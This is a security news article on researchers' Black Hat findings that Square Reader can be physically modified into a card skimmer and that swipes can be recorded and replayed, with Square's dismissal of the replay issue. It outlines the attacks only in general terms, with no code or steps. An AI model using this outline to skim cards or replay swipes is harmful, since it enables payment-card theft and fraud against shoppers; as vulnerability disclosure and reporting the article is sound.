Next time just be careful while swiping your credit card at small retailers or trendy stores that use Square Reader to accept credit card payments.
The increasingly popular and widely used Square Reader can be easily turned into a skimming device that can be used to steal your credit card data, a group of researchers warned.
Square Reader is a tiny device that allows small retailers to easily accept credit and debit card payments without having to spend the money on the traditional point of sale systems.
However, despite its convenience, this cheap and easy-to-use alternative has a critical flaw that could allow anyone to easily steal your payment card information.
All an attacker need is a screwdriver, superglue, and roughly 10 minutes to turn the latest generation Square Reader into a tiny, portable card skimmer.
Converting a New Generation Square Reader into a Card Skimmer?
A team of three security researchers from Boston University has discovered a way to physically modify the device and disable the encryption that generally protects your credit card data being transmitted to the smartphones.
The tampered device will look exactly like the Square Reader, but Square counters that the tampered device won't work with the official Square app.
However, researchers claim that even so, the modified device can still be used as a regular credit card skimmer to store and record card information.
An attacker could even develop an unofficial app that looks legit, but hides skimming code underneath. While chances of encountering such a device are unlikely, it's worth keeping an eye on your bank statements.
Method to Steal Credit Card Data without tampering with Square Reader
Besides this method, the researchers also discovered another flaw that allowed them to record credit card data directly into a smartphone, even by using a regular, non-altered, encrypted reader.
Malicious merchants can used the method to scam their customers by first swiping the credit cards on their smartphone and later play them back through the Square app to make fraudulent transactions.
"I can take that signal and convert it using a decoder freely available online, and then I have your credit card information," Alexandrea Mellen, one of the three security researchers, told Motherboard.
Square admitted that there is a possibility to playback recorded swipes using the methods described by the researchers, but the company dismissed this as an actual flaw.
"We do not see it as a security risk," a Square employee wrote in the report published on the Square's bug bounty service HackerOne. "In particular, it is not possible to process a stored swipe more than once."
The three security researchers, John Moore, Alexandrea Mellen and Artem Losev, are going to present their findings during a talk, "MOBILE POINT OF SCAM: ATTACKING THE SQUARE READER," on Wednesday at the Black Hat security conference in Las Vegas.